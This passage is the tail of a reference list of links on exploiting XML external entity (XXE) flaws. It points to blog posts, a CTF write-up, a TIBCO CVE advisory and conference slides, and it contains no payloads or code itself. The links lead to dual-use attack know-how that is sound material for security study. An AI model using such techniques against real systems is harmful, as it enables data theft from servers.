DTD discovery for XXE exploitation](https://www.gosecure.net/blog/2019/07/16/automating-local-dtd-discovery-for-xxe-exploitation) - July 16 2019 by Philippe Arteau +- [EXPLOITING XXE WITH EXCEL - NOV 12 2018 - MARC WICKENDEN](https://www.4armed.com/blog/exploiting-xxe-with-excel/) +- [excel-reader-xlsx #10](https://github.com/jmcnamara/excel-reader-xlsx/issues/10) +- [Midnight Sun CTF 2019 Quals - Rubenscube](https://jbz.team/midnightsunctfquals2019/Rubenscube) +- [SynAck - A Deep Dive into XXE Injection](https://www.synack.com/blog/a-deep-dive-into-xxe-injection/) - 22 July 2019 - Trenton Gordon +- [Synacktiv - CVE-2019-8986: SOAP XXE in TIBCO JasperReports Server](https://www.synacktiv.com/ressources/advisories/TIBCO_JasperReports_Server_XXE.pdf) - 11-03-2019 - Julien SZLAMOWICZ, Sebastien DUDEK +- [XXE: How to become a Jedi](https://2017.zeronights.org/wp-content/uploads/materials/ZN17_yarbabin_XXE_Jedi_Babin.pdf) - Zeronights 2017 - Yaroslav Babin +- [Payloads for Cisco and Citrix - Arseniy Sharoglazov](https://mohemiv.com/all/exploiting-xxe-with-local-dtd-files/) +- [Data exfiltration using XXE on a hardened server - Ritik Singh - Jan 29, 2022](https://infosecwriteups.com/data-exfiltration-using-xxe-on-a-hardened-server-ef3a3e5893ac) +- [REDTEAM TALES 0X1: SOAPY XXE - Uncover and exploit XXE vulnerability in SOAP WS - optistream](https://www.optistream.io/blogs/tech/redteam-stories-1-soapy-xxe)